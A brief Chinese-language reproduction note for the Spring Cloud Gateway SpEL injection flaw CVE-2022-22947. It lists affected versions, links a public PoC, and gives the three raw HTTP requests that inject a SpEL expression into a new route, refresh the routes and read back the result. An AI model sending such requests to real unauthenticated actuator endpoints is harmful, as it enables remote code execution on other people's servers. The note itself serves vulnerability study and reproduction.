目录
漏洞前提
Spring Cloud Gateway < 3.1.1
Spring Cloud Gateway < 3.0.7
Spring Cloud Gateway 其他已不再更新的版本
且actuator未鉴权
复现
poc可以参考:https://github.com/lucksec/Spring-Cloud-Gateway-CVE-2022-22947/blob/main/spring_cloud_RCE.py
第一个请求
第二个请求
回显
参考:
Spring_Cloud_Gateway_Actuator_API_SpEL表达式注入命令执行(CVE-2022-22947) - 火线 Zone-云安全社区
POST /actuator/gateway/routes/hacktest HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 303
{
"id": "hacktest",
"filters": [{
"name": "AddResponseHeader",
"args": {"name": "Result","value": "#{T(org.springframework.web.context.request.RequestContextHolder).getRequestAttributes().getResponse().addHeader(\"oh yes\",\"true\")}"}
}],
"uri": "http://example.com",
"order": 0
}
POST /actuator/gateway/refresh HTTP/1.1
Host: localhost:8081
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
GET /actuator/gateway/routes/hacktest HTTP/1.1
Host: ip
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 0
参考:CVE-2022-22947: SpEL Casting and Evil Beans – Wya.pl
Spring_Cloud_Gateway_Actuator_API_SpEL表达式注入命令执行(CVE-2022-22947) - 火线 Zone-云安全社区